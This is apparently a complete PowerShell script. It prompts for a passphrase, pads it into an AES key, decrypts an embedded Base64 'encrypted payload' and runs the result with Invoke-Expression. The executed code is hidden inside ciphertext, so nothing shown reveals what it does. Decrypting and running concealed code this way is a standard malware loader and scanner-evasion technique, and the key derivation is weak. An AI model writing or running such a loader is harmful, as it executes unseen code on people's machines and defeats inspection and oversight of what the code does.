# Prompt for passphrase
$securePass = Read-Host 'Enter passphrase' -AsSecureString
$passphrase = [Runtime.InteropServices.Marshal]::PtrToStringAuto(
                [Runtime.InteropServices.Marshal]::SecureStringToBSTR($securePass)
              )

# Derive key
$key = [System.Text.Encoding]::UTF8.GetBytes($passphrase.PadRight(32,'X'))[0..31]

# Encrypted payload (IV + ciphertext, Base-64)
$data = [Convert]::FromBase64String('xA18cjXe3PuTTnhVfCKpMyzbSp0VxR/FEg6wj/D7+i0NxXkUfUW3lgS8bd5szeIQ3Dpm/2incZUIfDdSpBmdaQjpn73XTlyH8fcSk8BwrLBM4LsLlMAJjzFmr0fxwD1ZqhZDQpamMQJ53etTkDwQ1fyAznRjqEOWlZUW5/v8oNIEmqZQH2x2BN/KWdTarXIxgoOVPamJ1oZNz8kubS8yRfQUKddP1VmuHCfjHbBmcThoN9XddPq6B3lQuNqvUxANUrSoY0IKhJJ3GL5e3N8qkYfvwuFSV0UkKbG20pVfPRf8dz9STGFJgsi1deAoS9p7jM3EIu/iDhNT4p8V7QSRF+IuAVTB3FKzA9SdoC1IQcU5xHk0x2/NMXsactPMxnWJLGd3H982juTdiKB7x2n4aRueB6PGcYVf488QvpJzeF/Ll2Pazif9OIHbAcX8LHpkHV1R9inKKMNxk1JspMF1QJ+GRPGL0UwhBycnjuJ6v/NonxctfxF+t/ghC31JfEAd0vmpFqWBH3X4tnw3reddaAty637+YuW5fHt1h44mctdO4xft2NSEgiByulltRVNwTeukBiGSwPvBClHy8fkTwBQoTFBgKimB5YbonpGfDoNqQZft4ASTA6LYqjJVXVxIREtXjL4Gat69KbReFxVCQxUkxwn8G676GnKcJAaHMvfvvXfHDUbWB1ZWTONyEuzk5yKEcx3B5+dixbVzqxqzoLMHR7Um5Y5WHrl5HqdxXKlGX4y2opNOMu2MZuSWKoi6mVaVXhSwzDVUoEyJZBH0PiU3sju8dF5E7bDfnFe4zHD36A7W1i6E11tW3j5j4IrJ4/XoIatgR+0QX99ccPaFHxDbUQ7F8n4sicQCV6dTp6c=')

# Split IV / cipher
$iv     = $data[0..15]
$cipher = $data[16..($data.Length-1)]

# Decrypt
$aes              = [Security.Cryptography.Aes]::Create()
$aes.Mode         = 'CBC'
$aes.Padding      = 'PKCS7'
$aes.Key, $aes.IV = $key, $iv
$plainBytes       = $aes.CreateDecryptor().TransformFinalBlock($cipher,0,$cipher.Length)

# Run payload
Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($plainBytes))